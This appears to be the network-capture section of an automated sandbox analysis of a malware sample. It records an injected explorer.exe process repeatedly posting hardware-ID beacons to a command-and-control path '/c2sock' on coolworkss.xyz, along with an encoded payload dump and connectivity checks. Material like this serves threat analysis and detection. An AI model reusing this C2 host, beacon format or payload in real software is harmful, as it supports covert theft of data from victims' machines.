                                                                                                                                                    Data Raw: 33 66 35 30 0d 0a 50 5a 2f 49 5a 36 76 67 37 31 4e 43 49 32 75 2f 66 30 5a 77 48 54 39 4f 63 77 62 6b 75 76 6b 67 39 47 31 35 67 4e 45 73 59 2f 5a 47 6b 73 4a 48 69 38 44 50 63 54 51 42 55 5a 39 4c 61 6e 30 58 48 32 35 54 4a 73 62 4a 6e 41 4c 4f 54 51 33 79 70 45 6c 50 2b 7a 65 2f 36 45 65 4c 77 6f 34 33 59 42 6c 4c 32 52 34 71 41 33 67 54 51 33 6b 6d 78 4a 72 5a 41 70 45 56 57 37 72 78 64 32 37 38 48 62 2f 6f 52 34 76 41 6c 46 35 49 41 30 75 66 58 32 5a 51 50 52 39 73 46 6d 6a 47 67 4e 6b 43 6b 51 63 62 34 62 31 4f 41 70 31 53 37 36 51 45 77 34 79 49 4f 79 64 41 44 39 34 54 4b 78 56 34 57 69 38 5a 61 49 33 58 6b 55 33 57 51 58 53 4b 38 51 78 44 31 68 32 2f 36 45 65 4a 68 5a 56 78 65 41 4e 4a 38 68 6f 79 45 56 42 65 50 52 67 6b 36 62 44 5a 41 4e 52 4e 57 61 43 73 41 47 37 38 48 62 2f 6f 52 34 76 41 6c 46 35 49 41 30 75 66 58 32 5a 51 50 52 39 73 46 6d 6a 47 67 4e 6b 43 6d 67 59 62 36 62 6c 4b 41 5a 4e 53 2b 4b 6b 43 79 6f 2b 4b 4f 79 35 47 44 64 45 55 4b 52 52 2f 57 69 67 55 64 6f 50 52 6c 30 37 57 51 58 53 4b 38 51 78 44 31 68 32 2f 36 45 65 4a 68 5a 56 78 65 41 4e 4a 38 68 6f 79 45 56 42 65 50 52 67 6b 36 62 44 5a 41 4e 52 4e 57 61 43 73 41 47 37 38 48 62 2f 6f 52 34 76 41 6c 46 35 49 41 30 75 66 58 32 5a 51 50 52 39 73 46 6d 6a 47 67 4e 6b 43 6b 51 6f 54 36 62 56 47 41 59 5a 61 38 36 45 45 77 34 53 4d 50 43 78 48 43 64 77 64 49 68 35 2f 57 69 73 44 64 6f 50 65 69
                                                                                                                                                    Data Ascii: 3f50PZ/IZ6vg71NCI2u/f0ZwHT9Ocwbkuvkg9G15gNEsY/ZGksJHi8DPcTQBUZ9Lan0XH25TJsbJnALOTQ3ypElP+ze/6EeLwo43YBlL2R4qA3gTQ3kmxJrZApEVW7rxd278Hb/oR4vAlF5IA0ufX2ZQPR9sFmjGgNkCkQcb4b1OAp1S76QEw4yIOydAD94TKxV4Wi8ZaI3XkU3WQXSK8QxD1h2/6EeJhZVxeANJ8hoyEVBePRgk6bDZANRNWaCsAG78Hb/oR4vAlF5IA0ufX2ZQPR9sFmjGgNkCmgYb6blKAZNS+KkCyo+KOy5GDdEUKRR/WigUdoPRl07WQXSK8QxD1h2/6EeJhZVxeANJ8hoyEVBePRgk6bDZANRNWaCsAG78Hb/oR4vAlF5IA0ufX2ZQPR9sFmjGgNkCkQoT6bVGAYZa86EEw4SMPCxHCdwdIh5/WisDdoPei
                                                                                                                                                    Sep 5, 2023 13:02:24.302638054 CEST2763INData Raw: 55 6a 57 51 58 53 4b 38 51 78 44 31 68 32 2f 36 45 65 4a 68 5a 56 78 65 41 4e 4a 36 77 30 7a 41 32 6b 66 47 52 4a 71 69 4e 2b 4e 41 76 6c 6e 57 61 44 78 44 45 50 57 51 4c 50 46 62 59 76 41 7a 33 4e 69 41 78 43 79 64 57 5a 51 50 52 39 75 55 79 62
                                                                                                                                                    Data Ascii: UjWQXSK8QxD1h2/6EeJhZVxeANJ6w0zA2kfGRJqiN+NAvlnWaDxDEPWQLPFbYvAz3NiAxCydWZQPR9uUybEmJxO1ldZorhODZNX+64Nxo2EIyFNB88aJBtxUiAYaYHVkEibCxzj8wBu/B2/6EeLwM9zYEYRnUVmUklNIR1KjdSSAvlnWaDxDEPWQLPFbYvAz3NiAxCydWZQPR9uUybEmJxO1ldZordCCZ5Q9KAPxouNOSlICt0R
                                                                                                                                                    Sep 5, 2023 13:02:24.302670956 CEST2764INData Raw: 6c 38 77 42 75 2f 42 32 2f 36 45 65 4c 77 4d 39 7a 59 45 59 52 6e 55 56 6d 55 6c 64 65 4e 67 73 6d 71 4e 4f 62 52 59 59 5a 41 4b 4c 63 4a 6b 50 57 48 62 2f 6f 52 39 62 4d 34 6c 6c 69 41 30 75 66 58 32 59 4c 45 44 56 75 55 79 62 45 6d 74 6b 41 31
                                                                                                                                                    Data Ascii: l8wBu/B2/6EeLwM9zYEYRnUVmUldeNgsmqNObRYYZAKLcJkPWHb/oR9bM4lliA0ufX2YLEDVuUybEmtkA1E8c7vMWQ9Rb9qAMyouJPCBIBtQVKRptXCYDYIPZlEiSBxftv0oTnx+zxW2LwM9zYgNLn10jCj8FblFEjc64UIRPdIrxDEPWHb+1S6bqz3NiA0ufBEt6PR9uUybEmtkCkQNbuvEOCJhe/KADwoeAMSVLDtEdJBF5Wy
                                                                                                                                                    Sep 5, 2023 13:02:24.302701950 CEST2765INData Raw: 46 2f 6d 36 6d 71 68 77 4d 39 7a 59 67 4e 4c 77 6c 4e 4c 65 68 51 66 62 67 67 4c 37 70 72 5a 41 4e 52 4e 57 61 44 78 44 67 61 59 48 36 58 6f 52 64 75 49 68 44 45 6a 54 67 37 5a 46 69 67 58 65 6c 49 76 47 47 47 50 31 6f 6c 4c 6d 41 63 54 37 62 5a
                                                                                                                                                    Data Ascii: F/m6mqhwM9zYgNLwlNLehQfbggL7prZANRNWaDxDgaYH6XoRduIhDEjTg7ZFigXelIvGGGP1olLmAcT7bZFAZlV8aoGicziWWIDS59fZlA9HSsJJN6a23CbAw3lvA5u/B2/6EeLwJJ/Tylin189fRcfblMmxJrZANYIF6LrDEGTW/2vC8yPiTwrUxvdGCUaeE8gG2+G1phJlg4X471LCNQRksJHi8DPc2IDS50aPFInH2w+Z5bO
                                                                                                                                                    Sep 5, 2023 13:02:24.302732944 CEST2767INData Raw: 4a 32 73 39 78 4a 45 6f 42 30 52 67 73 46 33 35 56 4a 68 6c 72 69 63 71 61 54 5a 38 49 45 4f 2b 38 51 41 53 61 54 66 71 68 44 73 47 4c 67 7a 64 67 44 32 61 31 58 32 5a 51 50 52 39 75 55 79 62 47 33 34 4d 43 7a 6b 31 62 31 4c 42 41 43 6f 56 51 2f
                                                                                                                                                    Data Ascii: J2s9xJEoB0RgsF35VJhlricqaTZ8IEO+8QASaTfqhDsGLgzdgD2a1X2ZQPR9uUybG34MCzk1b1LBACoVQ/qZFpurPc2IDS58Can0XNm5Tfemw2QDUTVmg8QxBk1O98keJjoMxL00F1hUlHnFaKRhsjsqaRp4OFe2ySgSRW/quA8bCw15IA0ufX2ZQPR9sFnzGgNkCuQgOw4kObvwdv+hHi8CSf08pYp9fPX0XH25TJsSa2QDWCB
                                                                                                                                                    Sep 5, 2023 13:02:24.302764893 CEST2768INData Raw: 55 30 44 31 68 6f 75 48 48 5a 54 4a 77 4e 32 68 64 79 59 53 35 55 49 45 75 79 7a 53 51 53 61 57 50 79 68 41 63 4f 42 69 33 46 75 4c 6d 47 66 58 32 5a 51 50 52 39 75 55 79 53 42 77 4e 73 61 31 45 38 33 34 62 4e 44 47 39 51 77 6c 65 68 48 69 38 44
                                                                                                                                                    Data Ascii: U0D1houHHZTJwN2hdyYS5UIEuyzSQSaWPyhAcOBi3FuLmGfX2ZQPR9uUySBwNsa1E834bNDG9QwlehHi8DPcz8PZrVfZlA9H24IC+6a2QDUTVmg8Q4GmB+l6EXDg4k/MkoF3A82AHlcIhpogduVTZUDHem7Tw6YVv2vCYnM4lliA0ufX2ZQPR0rCSTemttrvC5bjdsMQ9Ydv+gah+3lc2IDS59fPX0XH25TJsSa2QDWCBei6wxB
                                                                                                                                                    Sep 5, 2023 13:02:24.302797079 CEST2769INData Raw: 6e 45 33 56 55 49 42 35 6a 67 73 71 52 52 59 51 4f 47 75 6d 2b 51 67 47 5a 55 76 65 72 44 4d 53 4f 67 44 59 6e 54 67 79 64 55 30 74 36 50 52 39 75 55 79 62 45 6d 74 6b 43 6b 52 64 62 75 76 45 4f 49 4a 6c 55 38 66 46 66 69 65 33 6c 63 32 49 44 53
                                                                                                                                                    Data Ascii: nE3VUIB5jgsqRRYQOGum+QgGZUverDMSOgDYnTgydU0t6PR9uUybEmtkCkRdbuvEOIJlU8fFfie3lc2IDS59fO1wQNW5TJsSa2Vv5Z1mg8QxD1h2/6gLFwtVzYEED2BcpEXBePhBilNiWSIQFEOe+QwyXWfuhCduLjTIrAUeydWZQPR9uUybEmJxa1ldZopBZF55Y8bwOyIGbPDABZrVfZlA9H24OKumw2QDUTVmgqiFp1h2/6E
                                                                                                                                                    Sep 5, 2023 13:02:24.302828074 CEST2770INData Raw: 6c 4d 6d 78 4a 72 5a 41 4e 52 50 48 4f 37 7a 46 6b 50 55 58 2f 6d 6d 42 73 36 4d 67 6a 77 76 52 67 4c 53 46 79 6f 41 63 46 67 6b 48 57 79 4c 79 70 46 49 68 41 59 53 37 37 31 47 45 35 63 66 73 38 56 74 69 38 44 50 63 32 49 44 53 35 39 64 49 77 6f
                                                                                                                                                    Data Ascii: lMmxJrZANRPHO7zFkPUX/mmBs6MgjwvRgLSFyoAcFgkHWyLypFIhAYS771GE5cfs8Vti8DPc2IDS59dIwo/BW5RVozbl1SbAFuN2wxD1h2/6BqH7eVzYgNLn189fRcfblMmxJrZANYIF6LrDEGGTf2hBc6MnzAoTgPdGy8YfFQoH22A2ZZDlw8e4rpcDNQRksJHi8DPc2IDS50aPFInH2wmaI3pmFTWYHOg8QxD1h3ixW2LwM9z
                                                                                                                                                    Sep 5, 2023 13:02:24.302860022 CEST2772INData Raw: 5a 41 4e 52 4e 57 61 44 78 44 45 47 43 48 36 58 6f 56 34 66 74 35 58 4e 69 41 30 75 66 58 32 5a 51 50 30 39 73 53 53 62 47 6e 35 68 51 68 41 6b 59 39 4c 41 4a 50 36 70 63 36 36 63 4b 77 6f 4f 7a 44 77 35 4d 43 4e 34 54 5a 69 4e 70 55 44 77 53 59
                                                                                                                                                    Data Ascii: ZANRNWaDxDEGCH6XoV4ft5XNiA0ufX2ZQP09sSSbGn5hQhAkY9LAJP6pc66cKwoOzDw5MCN4TZiNpUDwSYYHmpUyRGxzstU5B2jCV6EeLwM9zYgNJ0l18UEYdZFFbyLfzANRNWaDxDEPUR73yR4m3jj8uRh/MUAcEclInECTIt/MA1E1ZoPEMQ9RZvfJHmcziWWIDS59fZlA9HSgAJN6ayxDNWki14xxu/B2/6EeLwJJ/TylLn1
                                                                                                                                                    Sep 5, 2023 13:02:24.302895069 CEST2773INData Raw: 6f 33 62 44 45 50 57 48 62 2f 6f 52 34 76 43 6d 33 46 34 41 31 75 54 63 6b 78 51 50 52 39 75 55 79 62 45 6d 74 74 51 31 6c 64 5a 6f 76 52 4e 45 34 5a 5a 2f 72 77 47 6a 72 79 7a 46 69 35 47 43 4d 73 4e 4d 78 31 42 59 7a 6b 53 61 6f 6a 66 6a 56 50
                                                                                                                                                    Data Ascii: o3bDEPWHb/oR4vCm3F4A1uTckxQPR9uUybEmttQ1ldZovRNE4ZZ/rwGjryzFi5GCMsNMx1BYzkSaojfjVPWQXSK8QxD1h2/6EeJjc1pYnhJlV0bXBA1blMmxJrZANRPA6LrDEGhXPOkAt+TwBYuRgjLDTMdPxNDeSbEmtkA1E1ZorUOWdYPs8Vti8DPc2IDS59dIAM/BW5BNt2NyBXGXXSK8QxD1h2/tUum6uZzYlhmtV9mUD0f
                                                                                                                                                    Sep 5, 2023 13:02:24.302927971 CEST2775INData Raw: 46 57 2f 48 69 52 66 62 4d 34 6c 6c 69 41 30 75 66 58 32 5a 51 50 52 30 30 55 54 7a 45 6d 4c 68 51 68 41 45 51 34 37 42 59 43 70 6c 54 37 4f 63 30 33 34 57 4f 50 6d 41 50 5a 72 56 66 5a 6c 41 39 48 32 35 54 4a 73 62 65 32 78 72 55 58 31 57 4e 32
                                                                                                                                                    Data Ascii: FW/HiRfbM4lliA0ufX2ZQPR00UTzEmLhQhAEQ47BYCplT7Oc034WOPmAPZrVfZlA9H25TJsbe2xrUX1WN2wxD1h2/6EeLwokgYBlLjU9/RywKfEML7prZANRNWf39IWnWHb/oR4ub4lliA0ufX2ZQPR06UTzEitUt/k1ZoPEMQ9YdvbhFkcDNdjJRBNgNJx17ViIWdcHmpXOACBjtjXAAmVP5oQCJzOJZYgNLn19mUD0dI1E8xO


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    5192.168.2.449739172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:24.621959925 CEST2779OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:24.622896910 CEST2779OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:25.021404982 CEST2780INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:24 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=ufc9sm70saeifvcl59qrfg292c; expires=Sat, 30 Dec 2023 04:49:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x15%2FIHVenl8FkGDt19Vzzz5tQd3gysC1U%2FXCktdZuEPY8KRdVQGa6zFdgoEfhXeaJ1hYICdz8dqyPZm886G0qQqm9VZn5GTDsOYTYVgBN5%2FbmpN%2BtV3b3Gf2tVFH9fQ0UQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfad44839b3e0-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:25.021457911 CEST2780INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    6192.168.2.449740104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:25.357520103 CEST2781OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:25.359893084 CEST2781OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:25.646537066 CEST2782INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:25 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=kpp6ht3poelm5fld5k91d9q0nn; expires=Sat, 30 Dec 2023 04:49:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zjg%2BowPMdIlMgPso6ZMB4bYmeSh89jcyQ7cLxB%2BB%2Bm08aBJbghOONqlVknGcH1LESjwNVFc5unLiJ%2FCkiWO%2ByL1MDtxnTmOI4M3454UPnK5AwcrddS1%2FyStdJCUEWti%2FmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfad8eef425b9-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:25.646569014 CEST2782INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    7192.168.2.449741172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:25.996526003 CEST2783OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:25.998500109 CEST2784OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:26.401204109 CEST2785INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:26 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=mvp2jgq5vb035oopisit29t7g2; expires=Sat, 30 Dec 2023 04:49:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xOWEHqzRTz2uAirYTmoQsxG1%2BdRBCd6w9FdeXoL5TB1oOklyuJvZ0YuKicNTK5rITWxMxj7RTtYMowgOJ5RI%2B6ttRmFNUMCuszsfs%2FHvyCTdE%2F7JXUPIvaF%2FMEuUoaUk%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfadcdee6db2d-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:26.401240110 CEST2785INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    8192.168.2.449742172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:26.752743959 CEST2785OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:26.753834009 CEST2786OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:27.148981094 CEST2787INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:27 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=29386pa6c961i2ubv3o9uq80au; expires=Sat, 30 Dec 2023 04:49:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H99AXUHkTRuSDvlQTMX%2BT3mhqnyHxu%2BrQHmvbc2bwo2E0dqmFf9FV1ptMnvVak8vdbOSlP3XtSUNV7Bm%2BXi40XnyFm0eH83DVQz11n2uq891xIpxi4hioR7ANG6%2FSI%2FEig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfae19a6c3dd9-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:27.149017096 CEST2787INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    9192.168.2.449743172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:27.463099003 CEST2788OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:27.464889050 CEST2788OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:27.864033937 CEST2789INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:27 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=fd9o2go9lihik9r5h7ohm9s18i; expires=Sat, 30 Dec 2023 04:49:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eWQXd0KJvD2gSVe4UIRZORFbOElLUIDAKYZJhPFF9hM91vOnkndvwW%2FT0yoBbO2aM4nnqHBO7XJvllJZnd0jK%2BrfJ594FeOxviafmSExcdlcTShb5VZz%2FF2TghaB8OCdyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfae60eb58dee-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:27.864068031 CEST2789INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.449717104.18.6.142443C:\Users\user\Desktop\lJ2eYRm0Bd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2023-09-05 11:01:20 UTC0OUTGET / HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Host: wwf.org
                                                                                                                                                    2023-09-05 11:01:20 UTC0INHTTP/1.1 302 Found
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:01:20 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Cache-Control: max-age=0
                                                                                                                                                    Strict-Transport-Security: max-age=15552000
                                                                                                                                                    Location: https://www.worldwildlife.org?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm_content=wwf.org
                                                                                                                                                    Expires: Tue, 05 Sep 2023 11:01:20 GMT
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Set-Cookie: X-Mapping-ekdchbfg=C62F84DC1198965E2E468D7665047166; path=/
                                                                                                                                                    X-UA-Compatible: IE=edge
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801df9433f2c8db4-MIA
                                                                                                                                                    2023-09-05 11:01:20 UTC0INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.449718104.18.6.94443C:\Users\user\Desktop\lJ2eYRm0Bd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2023-09-05 11:01:21 UTC0OUTGET /?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm_content=wwf.org HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Host: www.worldwildlife.org
                                                                                                                                                    2023-09-05 11:01:21 UTC0INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:01:21 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Cache-Control: max-age=0, private, must-revalidate
